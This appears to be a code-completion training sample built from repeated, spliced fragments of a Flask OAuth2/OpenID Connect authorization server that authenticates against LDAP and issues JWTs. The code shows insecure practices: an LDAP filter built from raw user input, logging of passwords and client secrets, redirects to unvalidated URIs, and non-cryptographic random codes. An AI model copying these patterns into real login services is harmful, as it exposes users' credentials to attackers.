'request': query_recv,
'scope': scope, #request.form['scope'],
'user': request.form['username'],
'client_id': query['client_id']
};
response = redirect(url, code=302)
return response
#
# 認証の成功を受けて、
# access_token, id_token を発行してアプリへ提供する
#
@app.route('/token', methods=['POST', 'GET'])
@auth.login_required
def token():
app.logger.debug("/token")
app.logger.debug(request.headers)
app.logger.debug(request.form)
clientId = None
clientSecret = None
# authorizationヘッダーから client_id と client_secret を取り出す
if 'authorization' in request.headers:
app.logger.debug("authorization = " + request.headers['authorization'])
app.logger.debug("client_id = " + auth.username())
app.logger.debug("client_secret = " + get_pw(auth.username()))
clientId = auth.username()
clientSecret = get_pw(auth.username())
# client_id がPOSTされていればclient_id と client_secret を取り出す
if 'client_id' in request.form:
# clientId が二つの方法で送られてきたら不審なクライアントと判断
if clientId != None:
app.logger.debug('Client attempted to authenticate with multiple methods')
return {'error': 'invalid_client'}, 401
clientId = request.form['client_id']
clientSecret = request.form['client_secret']
# client_id の存在と一致のチェック
if check_client_id(clientId) == False:
app.logger.debug('Unknown client ' + clientId)
return {'error': 'invalid_client'}, 401
# client_secret パスワードの一致チェック
if check_client_secret(clientId,clientSecret) == False:
app.logger.debug('Mismatched client secret')
return {'error': 'invalid_client'}, 401
app.logger.debug("code = " + request.form['code'])
app.logger.debug("redirect_uri = " + request.form['redirect_uri'])
app.logger.debug("grant_type = " + request.form['grant_type'])
# grant_type のチェック
if request.form['grant_type'] != 'authorization_code':
app.logger.debug('Unknown grant type ' + request.form['grant_type'])
return {'error': 'unsupported_grant_type'}, 400
# リクエストのコードがDBに存在していなければエラー応答
code = request.form['code']
if code not in codes:
app.logger.debug('Unknown code ' + code)
return {'error': 'Unknown code '}, 400
# 自己のDBからcodeを削除して再利用を防止する
code = codes.pop(code)
###
### アクセストークン作成
###
# アクセストークンは 2つの方法がある
# 1 乱数文字を生成、対応する情報をKVSでアプリと共有する
# 2 JWTを作成 アプリでJWTをバリデーションすることで情報を得る
# 以下は
# ランダムな文字列でアクセストークンを生成
# アプリサーバーが、リソースサーバーへアクセスする際に
# HTTPヘッダのAuthorization にaccess_token をセットする。
# つまり、JWTをセットすることも可能であり、ISTIOにも適用できるだろう
#
#access_token = get_random_string(26)
access_token = create_access_token(clientId, get_userinfo(code['user']))
app.logger.debug("access_token = ")
app.logger.debug(access_token)
#>>> claims = jwt.decode(s, read_file('public.pem'))
#>>> print(claims)
#{'iss': 'Authlib', 'sub': '123', ...}
#>>> print(claims.header)
#{'alg': 'RS256', 'typ': 'JWT'}
#>>> claims.validate()
# NoSQLに保存
# access_token はNoSQLに登録しておき、リソースサーバーでNoSQLをアクセスして
# access_token を照合して、不一致であればアクセスを拒否する
access_token_data = {
'access_token': access_token,
'client_id': clientId,
'scope': code['scope'],
'user': get_userinfo(code['user'])
}
col_atoken.insert_one(access_token_data)
###
### IDトークンを作成
###
# スコープをセット
cscope = None
if 'scope' in code:
cscope = code['scope']
app.logger.debug("toke_response")
token_response = {
'access_token': access_token,
'token_type': 'Bearer',
'scope': cscope
}
# スコープにopenid が存在、ユーザーがセットされていたら
work_scope = code['scope'].split(" ")
if ('openid' in work_scope ) and ('user' in code):
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver'
}
#
# LDAPからユーザーの属性をセットする
#
app.logger.debug("mongo user = " + code['user'])
app.logger.debug("mongo client_id = " + code['client_id'])
for c in code:
app.logger.debug(c)
user_info = search_ldap(code['user'])
app.logger.debug("user_info = " + user_info['cn'][0])
#
# OIDCのペイロード
# 参考 https://qiita.com/TakahikoKawasaki/items/8f0e422c7edd2d220e06
# https://openid.net/specs/openid-connect-core-1_0.html#StandardClaims
#
payload = {
'iss': cf.OAUTH_SERVER_URL, # 認証サーバーのURLアドレス
'sub': code['user'], # 一意のユーザーUID
'aud': code['client_id'], # 認可を受けたアプリID
'name': user_info['cn'][0], # ユーザー名
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 300 # 有効期限時刻 5分
}
# リクエストのnonceが入っていれば nonceを追加する
if 'request' in code:
if 'nonce' in code['request']:
payload['nonce'] = code['request']['nonce']
# JWTの生成
with open('key-private.pem', 'rb') as f:
prvkey = f.read()
id_token = jwt.encode(header, payload, prvkey)
app.logger.debug('Issued tokens for code ' + id_token.decode())
app.logger.debug('id_tokenはバイナリからストリング化する')
token_response['id_token'] = id_token.decode()
app.logger.debug('id_tokenはバイナリからストリング化した')
return token_response, 200
##
## MAIN
##
if __name__ == '__main__':
api = Api(app)
bx_port = os.getenv("PORT")
listen_port = int(bx_port if bx_port else 5000)
app.run(host='0.0.0.0', port=listen_port, debug=True)
app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# 認証認可サーバー
#
import os
import uuid
import json
import hashlib
import requests
import time
import base64
import auth_config as cf
# Flaskフレームワーク関連
from flask import Flask,render_template,make_response,request,send_from_directory,redirect,send_file
from flask_restful import Resource,Api,reqparse
from flask_httpauth import HTTPBasicAuth
# https://flask-cors.readthedocs.io/en/latest/
from flask_cors import CORS
# OAuth2関連
#import python_jwt as jwt, jwcrypto.jwk as jwk, datetime
from authlib.jose import jwt
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
# URL操作
import urllib.parse
# アクセストークンDB MongoDB
from pymongo import MongoClient
from datetime import datetime
#MONGO_SERVER = 'mongo'
#MONGO_PORT = 27017
#MONGO_DATABASE = 'oidc_database'
#MONGO_COLLECTION_ACCESS_TOKEN = "access_token"
#MONGO_COLLECTION_CLIENTS = "clients"
#MONGO_COLLECTION_USERINFO = "userinfo"
client = MongoClient(cf.MONGO_SERVER, cf.MONGO_PORT)
db = client[cf.MONGO_DATABASE]
col_atoken = db[cf.MONGO_COLLECTION_ACCESS_TOKEN]
col_clients = db[cf.MONGO_COLLECTION_CLIENTS]
col_userinfo = db[cf.MONGO_COLLECTION_USERINFO]
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
#LDAP_SERVER='ldap.labo.local'
#LDAP_PORTNO=636
#USE_LDAPS=True
#LDAP_DOMAIN='dc=labo,dc=local'
#LDAP_USER='cn=Manager,dc=labo,dc=local'
#LDAP_PASSWD='secret'
# 認証サーバーのアドレス
#OAUTH_SERVER_URL='http://localhost:5810/'
# Flaskの初期化
# ブラウザのJavaScriptからヘッダー Authorization を読み取れるようにするための設定を加える
# Cross-Origin Resource Sharing (CORS) を設定して、他オリジンからのアクセスを許可する
# 参考 https://flask-cors.readthedocs.io/en/latest/
#
app = Flask(__name__, static_url_path='/public')
app.config['CORS_EXPOSE_HEADERS'] = "*"
CORS(app)
auth = HTTPBasicAuth()
codes = {}
requests = {}
#-------------------------------------
# 関数 ユーザー名から取得
def get_userinfo(user):
return col_userinfo.find_one({'uid': user},{"_id": 0})
# 関数 ランダム文字列生成
import random, string
def get_random_string(n):
return ''.join(random.choices(string.ascii_letters + string.digits, k=n))
# 関数 client_id のチェック
#
def check_client_id(client_id):
return col_clients.find_one({'client_id': client_id},{"_id": 0}) != None
# 関数 リダイレクト先指定のチェック
def check_redirect(client_id,redirect_uri):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
for uri in doc['redirect_uris']:
if uri == redirect_uri:
return True
return False
# 関数 スコープのチェック
def check_scope(client_id,scope):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
cscope = doc['scope'].split(" ")
rscope = scope.split(" ")
for req in rscope:
if req not in cscope:
return False
return True
# 関数 クライアントid とsecret のチェック
def check_client_secret(client_id,client_secret):
query = {"client_id": client_id, "client_secret": client_secret}
return col_clients.find_one(query,{"_id": 0}) != None
# 関数 クライアントIDからパスワードを得る
@auth.get_password
def get_pw(client_id):
doc = col_clients.find_one({'client_id': client_id},{'_id': 0,'client_secret': 1 })
if doc != None:
return doc['client_secret']
else:
return None
# 関数 ログインをLDAPサーバーの応答と比較する
def valid_login(user_id,passwd):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("==================")
app.logger.debug(data_json)
app.logger.debug("==================")
ssha_pw = data_json['attributes']['userPassword'][0]
check = ssha.checkPassword( passwd, ssha_pw, suffixed = True, salt_size = 4, debug = 3)
return check
def search_ldap(user_id):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','sn','cn','ou','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("xxxxxxxxxxxxxxxxxx")
app.logger.debug(data_json)
app.logger.debug(data_json['attributes'])
app.logger.debug("xxxxxxxxxxxxxxxxxx")
return data_json['attributes']
#
# JWT生成 アクセストークン
#
def create_access_token(apl_id,user_id):
app.logger.debug("create_access_token ")
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver',
}
payload = {
"iss": "Auth_Server",
"sub": apl_id,
"aud": user_id,
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 3600, # 有効期限時刻 1時間
"scope": "openid profile email address phone read:appointments"
}
with open('key-private.pem', 'rb') as f:
key = f.read()
return jwt.encode(header, payload, key).decode()
#-------------------------------------
#
# ダミーのトップページを表示
# 認証認可サーバーであることを表示
#
@app.route('/')
def home():
return render_template('index.html', title='plane-test', name="home")
#
# 公開鍵の配布
#
@app.route('/publickey')
def download_file():
path = "/app/key-public.pem"
return send_file(path)
#
# 認証と認可
#
# クライアント(アプリ)からの要求を受けて、
# 認証画面(ログイン)フォームを表示する
#
# 不正アクセス防止のチェックで問題が検知されたら error をつけて
# リダイレクト先へリクエストを送る
#
@app.route('/authorize')
def authorize():
app.logger.debug(request.url)
app.logger.debug(request.method)
qs = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(qs.query))
app.logger.debug(query)
# reqid を生成して、/authn でチェックする
# フォームの隠しフィールドにreqid をセットして、次でチェックする。
reqid = get_random_string(8)
app.logger.debug("client_id = " + query['client_id'])
#app.logger.debug("client_secret = " + query['client_secret'])
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("scope = " + query['scope'])
app.logger.debug("state = " + query['state'])
app.logger.debug("response_type = " + query['response_type'])
app.logger.debug("reqid = " + reqid)
# クライアントIDの存在チェック
# クライアントID(アプリID)は、事前に認証サーバーに登録されていないといけない
if check_client_id(query['client_id']) == False:
app.logger.debug('Unknown client = ' + query['client_id'])
resp = { 'error': 'Unknown client' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# リダイレクトURLのチェック
# リダイレクト先URIも、事前に認証サーバーに登録されていなければならない
if check_redirect(query['client_id'],query['redirect_uri']) == False:
app.logger.debug('Invalid redirect URI = ' + query['client_id'],query['redirect_uri'])
resp = { 'error': 'Invalid redirect URI' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# 次の処理を照合するためにDBへ保存する
requests[reqid] = qs.query
# 個人を認証(ログイン)フォームを表示
return render_template('authorize.html',
client_id=query['client_id'],
redirect_uri=query['redirect_uri'],
state=query['state'],
reqid=reqid,scope=query['scope'])
#
# 認証(ログイン)フォームからのインプットを受け、
# ユーザーIDとパスワードを照合して、一致していれば、認証は成功とする
#
## Approve
@app.route('/approve', methods=['POST', 'GET'])
def authn():
## 認証の処理を実行
## QSの存在チェック 無ければエラー応答
## QSの内容は?
## 1. client_id
## 2. redirect_uris
## 3. state
##
## レスポンスタイプ code であれば処理
## scope の範囲の逸脱が無いことをチェック
#
# ユーザーの認証もここで実施
#
# user: フォームから取得
# scope: フォームから取得
# client_id: QSから取得
# code, state のQSをつけて、リダイレクト先へ転送する
query_recv = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(query_recv.query))
# reqidをキーとして送ったQuery String を取り出して
# 辞書からキーreqidの値を削除する
reqid = request.form['reqid']
query_sent = None
squery = {}
if reqid in requests:
query_sent = requests.pop(reqid)
squery = dict(urllib.parse.parse_qsl(query_sent))
else:
# 送信したQuery String のIDが無ければ、不正としてエラーを返す
app.logger.debug('No matching authorization request [' + reqid + ']')
resp = { 'error': 'No matching authorization request' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug(query_recv)
app.logger.debug("client_id = " + query['client_id'])
app.logger.debug("username = " + request.form['username'])
app.logger.debug("password = " + request.form['password'])
#app.logger.debug("scope = " + request.form['scope'])
#app.logger.debug("scope2 = " + request.form.getlist['scope2'])
app.logger.debug("scope2 ======")
scope2 = request.form.getlist('scope2')
scope = ""
n = 0
for x in scope2:
if n == 0:
scope = x
else:
scope = scope + " " + x
n = n + 1
app.logger.debug("scope = " + scope)
app.logger.debug(scope)
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("state = " + query['state'])
#############################################################
# 認証 ユーザーID と パスワードのチェック LDAPで照合
#############################################################
if valid_login(request.form['username'],request.form['password']):
app.logger.debug("認証成功")
else:
resp = { 'error': 'id or password failed' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
if 'approve' not in request.form:
resp = { 'error': 'access_denied' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug("approve = " + request.form['approve'])
# 送信したQSのレスポンスタイプがcodeで無ければエラーを返す
if squery['response_type'] != 'code':
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code へ 8桁のランダムな文字列セット
code = get_random_string(8)
# QSを追加して、リダイレクトするURIを作る
resp_qs = {}
resp_qs['code'] = code # ランダムな文字列を生成してセット
resp_qs['state'] = query['state'] # クライアントから出されたランダム文字列
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp_qs)
app.logger.debug("URL = " + url)
# スコープのチェック
#if not check_scope(query['client_id'], request.form['scope']):
if not check_scope(query['client_id'], scope):
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code をキーにして以下を保存する
codes[code] = {
'request': query_recv,
'scope': scope, #request.form['scope'],
'user': request.form['username'],
'client_id': query['client_id']
};
response = redirect(url, code=302)
return response
#
# 認証の成功を受けて、
# access_token, id_token を発行してアプリへ提供する
#
@app.route('/token', methods=['POST', 'GET'])
@auth.login_required
def token():
app.logger.debug("/token")
app.logger.debug(request.headers)
app.logger.debug(request.form)
clientId = None
clientSecret = None
# authorizationヘッダーから client_id と client_secret を取り出す
if 'authorization' in request.headers:
app.logger.debug("authorization = " + request.headers['authorization'])
app.logger.debug("client_id = " + auth.username())
app.logger.debug("client_secret = " + get_pw(auth.username()))
clientId = auth.username()
clientSecret = get_pw(auth.username())
# client_id がPOSTされていればclient_id と client_secret を取り出す
if 'client_id' in request.form:
# clientId が二つの方法で送られてきたら不審なクライアントと判断
if clientId != None:
app.logger.debug('Client attempted to authenticate with multiple methods')
return {'error': 'invalid_client'}, 401
clientId = request.form['client_id']
clientSecret = request.form['client_secret']
# client_id の存在と一致のチェック
if check_client_id(clientId) == False:
app.logger.debug('Unknown client ' + clientId)
return {'error': 'invalid_client'}, 401
# client_secret パスワードの一致チェック
if check_client_secret(clientId,clientSecret) == False:
app.logger.debug('Mismatched client secret')
return {'error': 'invalid_client'}, 401
app.logger.debug("code = " + request.form['code'])
app.logger.debug("redirect_uri = " + request.form['redirect_uri'])
app.logger.debug("grant_type = " + request.form['grant_type'])
# Check the grant_type
if request.form['grant_type'] != 'authorization_code':
app.logger.debug('Unknown grant type ' + request.form['grant_type'])
return {'error': 'unsupported_grant_type'}, 400
# Respond with an error if the submitted code does not exist in the DB
code = request.form['code']
if code not in codes:
app.logger.debug('Unknown code ' + code)
return {'error': 'Unknown code '}, 400
# Delete the code from our DB to prevent reuse
code = codes.pop(code)
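# 'code' now refers to the stored record (request, scope, user, client_id), not the code string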
###
### Create the access token
###
# There are two ways to issue an access token:
# 1. Generate a random string and share the associated data with the app via a KVS
# 2. Create a JWT; the app obtains the data by validating the JWT
# Below,
# the access token is generated (originally as a random string);
# when the app server accesses the resource server it sets access_token
# in the HTTP Authorization header.
# That means a JWT can be set there too, so this should also work with Istio.
#
#access_token = get_random_string(26)
access_token = create_access_token(clientId, get_userinfo(code['user']))
app.logger.debug("access_token = ")
app.logger.debug(access_token)
#>>> claims = jwt.decode(s, read_file('public.pem'))
#>>> print(claims)
#{'iss': 'Authlib', 'sub': '123', ...}
#>>> print(claims.header)
#{'alg': 'RS256', 'typ': 'JWT'}
#>>> claims.validate()
# Save to NoSQL
# The access_token is stored in NoSQL; the resource server queries NoSQL,
# compares the access_token, and denies access if it does not match
access_token_data = {
'access_token': access_token,
'client_id': clientId,
'scope': code['scope'],
'user': get_userinfo(code['user'])
}
col_atoken.insert_one(access_token_data)
###
### Create the ID token
###
# Set the scope
cscope = None
if 'scope' in code:
cscope = code['scope']
app.logger.debug("toke_response")
token_response = {
'access_token': access_token,
'token_type': 'Bearer',
'scope': cscope
}
# If the scope contains openid and a user is set
work_scope = code['scope'].split(" ")
if ('openid' in work_scope ) and ('user' in code):
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver'
}
#
# Set the user attributes from LDAP
#
app.logger.debug("mongo user = " + code['user'])
app.logger.debug("mongo client_id = " + code['client_id'])
for c in code:
app.logger.debug(c)
user_info = search_ldap(code['user'])
app.logger.debug("user_info = " + user_info['cn'][0])
#
# OIDC payload
# Reference: https://qiita.com/TakahikoKawasaki/items/8f0e422c7edd2d220e06
# https://openid.net/specs/openid-connect-core-1_0.html#StandardClaims
#
payload = {
'iss': cf.OAUTH_SERVER_URL, # URL of the authorization server
'sub': code['user'], # unique user UID
'aud': code['client_id'], # ID of the authorized application
'name': user_info['cn'][0], # user name
'iat': int(time.time()), # issued at (now)
'exp': int(time.time()) + 300 # expires in 5 minutes
}
# If the request contained a nonce, add it to the payload
if 'request' in code:
if 'nonce' in code['request']:
payload['nonce'] = code['request']['nonce']
# Generate the JWT
with open('key-private.pem', 'rb') as f:
prvkey = f.read()
id_token = jwt.encode(header, payload, prvkey)
app.logger.debug('Issued tokens for code ' + id_token.decode())
app.logger.debug('decoding id_token from bytes to a string')
token_response['id_token'] = id_token.decode()
app.logger.debug('decoded id_token from bytes to a string')
return token_response, 200
##
## MAIN
##
if __name__ == '__main__':
api = Api(app)
bx_port = os.getenv("PORT")
listen_port = int(bx_port if bx_port else 5000)
app.run(host='0.0.0.0', port=listen_port, debug=True)
| ent_id のチェック | identifier_name |
app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Authentication and authorization server
#
import os
import uuid
import json
import hashlib
import requests
import time
import base64
import auth_config as cf
# Flask framework
from flask import Flask,render_template,make_response,request,send_from_directory,redirect,send_file
from flask_restful import Resource,Api,reqparse
from flask_httpauth import HTTPBasicAuth
# https://flask-cors.readthedocs.io/en/latest/
from flask_cors import CORS
# OAuth2
#import python_jwt as jwt, jwcrypto.jwk as jwk, datetime
from authlib.jose import jwt
# LDAP
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
# URL handling
import urllib.parse
# Access-token DB (MongoDB)
from pymongo import MongoClient
from datetime import datetime
#MONGO_SERVER = 'mongo'
#MONGO_PORT = 27017
#MONGO_DATABASE = 'oidc_database'
#MONGO_COLLECTION_ACCESS_TOKEN = "access_token"
#MONGO_COLLECTION_CLIENTS = "clients"
#MONGO_COLLECTION_USERINFO = "userinfo"
client = MongoClient(cf.MONGO_SERVER, cf.MONGO_PORT)
db = client[cf.MONGO_DATABASE]
col_atoken = db[cf.MONGO_COLLECTION_ACCESS_TOKEN]
col_clients = db[cf.MONGO_COLLECTION_CLIENTS]
col_userinfo = db[cf.MONGO_COLLECTION_USERINFO]
# LDAP
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
#LDAP_SERVER='ldap.labo.local'
#LDAP_PORTNO=636
#USE_LDAPS=True
#LDAP_DOMAIN='dc=labo,dc=local'
#LDAP_USER='cn=Manager,dc=labo,dc=local'
#LDAP_PASSWD='secret'
# Address of the authorization server
#OAUTH_SERVER_URL='http://localhost:5810/'
# Initialize Flask
# Add settings so that JavaScript in the browser can read the Authorization header
# Configure Cross-Origin Resource Sharing (CORS) to allow access from other origins
# Reference: https://flask-cors.readthedocs.io/en/latest/
#
app = Flask(__name__, static_url_path='/public')
app.config['CORS_EXPOSE_HEADERS'] = "*"
CORS(app)
auth = HTTPBasicAuth()
codes = {}
requests = {}
#-------------------------------------
# Function: get user info by user name
def get_userinfo(user):
return col_userinfo.find_one({'uid': user},{"_id": 0})
# Function: generate a random string
import random, string
def get_random_string(n):
return ''.join(random.choices(string.ascii_letters + string.digits, k=n))
# Function: check the client_id
#
def check_client_id(client_id):
return col_clients.find_one({'client_id': client_id},{"_id": 0}) != None
# Function: check the registered redirect URI
def check_redirect(client_id,redirect_uri):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
for uri in doc['redirect_uris']:
if uri == redirect_uri:
return True
return False
# Function: check the scope
def check_scope(client_id,scope):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
cscope = doc['scope'].split(" ")
rscope = scope.split(" ")
for req in rscope:
if req not in cscope:
return False
return True
# Function: check the client id and secret
def check_client_secret(client_id,client_secret):
query = {"client_id": client_id, "client_secret": client_secret}
return col_clients.find_one(query,{"_id": 0}) != None
# Function: get the secret for a client ID
@auth.get_password
def get_pw(client_id):
doc = col_clients.find_one({'client_id': client_id},{'_id': 0,'client_secret': 1 })
if doc != None:
return doc['client_secret']
else:
return None
# Function: validate the login against the LDAP server
def valid_login(user_id,passwd):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("==================")
app.logger.debug(data_json)
app.logger.debug("==================")
ssha_pw = data_json['attributes']['userPassword'][0]
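# Verify the submitted password against the SSHA hash stored in LDAP (suffixed salt)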
check = ssha.checkPassword( passwd, ssha_pw, suffixed = True, salt_size = 4, debug = 3)
return check
def search_ldap(user_id):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','sn','cn','ou','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("xxxxxxxxxxxxxxxxxx")
app.logger.debug(data_json)
app.logger.debug(data_json['attributes'])
app.logger.debug("xxxxxxxxxxxxxxxxxx")
return data_json['attributes']
#
# Generate a JWT access token
#
def create_access_token(apl_id,user_id):
app.logger.debug("create_access_token ")
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver',
}
payload = {
"iss": "Auth_Server",
"sub": apl_id,
"aud": user_id,
'iat': int(time.time()), # issued at (now)
'exp': int(time.time()) + 3600, # expires in 1 hour
"scope": "openid profile email address phone read:appointments"
}
with open('key-private.pem', 'rb') as f:
key = f.read()
return jwt.encode(header, payload, key).decode()
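# Minimal verification sketch (assumes key-public.pem is the public half of key-private.pem):
# from authlib.jose import jwt
# claims = jwt.decode(token, open('key-public.pem', 'rb').read())
# claims.validate() # raises if exp/iat are invalid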
#-------------------------------------
#
# Serve a dummy top page
# showing that this is the authentication/authorization server
#
@app.route('/')
def home():
return render_template('index.html', title='plane-test', name="home")
#
# Distribute the public key
#
@app.route('/publickey')
def download_file():
path = "/app/key-public.pem"
return send_file(path)
#
# Authentication and authorization
#
# On a request from the client (app),
# display the authentication (login) form
#
# If the abuse-prevention checks detect a problem, attach an error
# and send the request on to the redirect URI
#
@app.route('/authorize')
def authorize():
app.logger.debug(request.url)
app.logger.debug(request.method)
qs = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(qs.query))
app.logger.debug(query)
# Generate a reqid, to be checked in /authn
# Put the reqid in a hidden form field and verify it in the next step.
reqid = get_random_string(8)
app.logger.debug("client_id = " + query['client_id'])
#app.logger.debug("client_secret = " + query['client_secret'])
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("scope = " + query['scope'])
app.logger.debug("state = " + query['state'])
app.logger.debug("response_type = " + query['response_type'])
app.logger.debug("reqid = " + reqid)
| st' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug(query_recv)
app.logger.debug("client_id = " + query['client_id'])
app.logger.debug("username = " + request.form['username'])
app.logger.debug("password = " + request.form['password'])
#app.logger.debug("scope = " + request.form['scope'])
#app.logger.debug("scope2 = " + request.form.getlist['scope2'])
app.logger.debug("scope2 ======")
scope2 = request.form.getlist('scope2')
scope = ""
n = 0
for x in scope2:
if n == 0:
scope = x
else:
scope = scope + " " + x
n = n + 1
app.logger.debug("scope = " + scope)
app.logger.debug(scope)
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("state = " + query['state'])
#############################################################
# Authentication: check the user ID and password against LDAP
#############################################################
if valid_login(request.form['username'],request.form['password']):
app.logger.debug("認証成功")
else:
resp = { 'error': 'id or password failed' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
if 'approve' not in request.form:
resp = { 'error': 'access_denied' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug("approve = " + request.form['approve'])
# Return an error unless the response_type sent in the query string is 'code'
if squery['response_type'] != 'code':
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# Set an 8-character random string as the authorization code
code = get_random_string(8)
# Add the query string and build the redirect URI
resp_qs = {}
resp_qs['code'] = code # the random string generated above
resp_qs['state'] = query['state'] # the random string supplied by the client
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp_qs)
app.logger.debug("URL = " + url)
# Check the scope
#if not check_scope(query['client_id'], request.form['scope']):
if not check_scope(query['client_id'], scope):
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# Store the following, keyed by the authorization code
codes[code] = {
'request': query_recv,
'scope': scope, #request.form['scope'],
'user': request.form['username'],
'client_id': query['client_id']
};
response = redirect(url, code=302)
return response
#
# After successful authentication,
# issue an access_token and id_token and provide them to the application
#
@app.route('/token', methods=['POST', 'GET'])
@auth.login_required
def token():
app.logger.debug("/token")
app.logger.debug(request.headers)
app.logger.debug(request.form)
clientId = None
clientSecret = None
# Extract client_id and client_secret from the Authorization header
if 'authorization' in request.headers:
app.logger.debug("authorization = " + request.headers['authorization'])
app.logger.debug("client_id = " + auth.username())
app.logger.debug("client_secret = " + get_pw(auth.username()))
clientId = auth.username()
clientSecret = get_pw(auth.username())
# If client_id was POSTed, take client_id and client_secret from the form
if 'client_id' in request.form:
# If the client ID was sent by both methods, treat the client as suspicious
if clientId != None:
app.logger.debug('Client attempted to authenticate with multiple methods')
return {'error': 'invalid_client'}, 401
clientId = request.form['client_id']
clientSecret = request.form['client_secret']
# Check that the client_id exists and matches
if check_client_id(clientId) == False:
app.logger.debug('Unknown client ' + clientId)
return {'error': 'invalid_client'}, 401
# Check that the client_secret matches
if check_client_secret(clientId,clientSecret) == False:
app.logger.debug('Mismatched client secret')
return {'error': 'invalid_client'}, 401
app.logger.debug("code = " + request.form['code'])
app.logger.debug("redirect_uri = " + request.form['redirect_uri'])
app.logger.debug("grant_type = " + request.form['grant_type'])
# Check the grant_type
if request.form['grant_type'] != 'authorization_code':
app.logger.debug('Unknown grant type ' + request.form['grant_type'])
return {'error': 'unsupported_grant_type'}, 400
# Respond with an error if the submitted code does not exist in the DB
code = request.form['code']
if code not in codes:
app.logger.debug('Unknown code ' + code)
return {'error': 'Unknown code '}, 400
# Delete the code from our DB to prevent reuse
code = codes.pop(code)
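# 'code' now refers to the stored record (request, scope, user, client_id), not the code string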
###
### Create the access token
###
# There are two ways to issue an access token:
# 1. Generate a random string and share the associated data with the app via a KVS
# 2. Create a JWT; the app obtains the data by validating the JWT
# Below,
# the access token is generated (originally as a random string);
# when the app server accesses the resource server it sets access_token
# in the HTTP Authorization header.
# That means a JWT can be set there too, so this should also work with Istio.
#
#access_token = get_random_string(26)
access_token = create_access_token(clientId, get_userinfo(code['user']))
app.logger.debug("access_token = ")
app.logger.debug(access_token)
#>>> claims = jwt.decode(s, read_file('public.pem'))
#>>> print(claims)
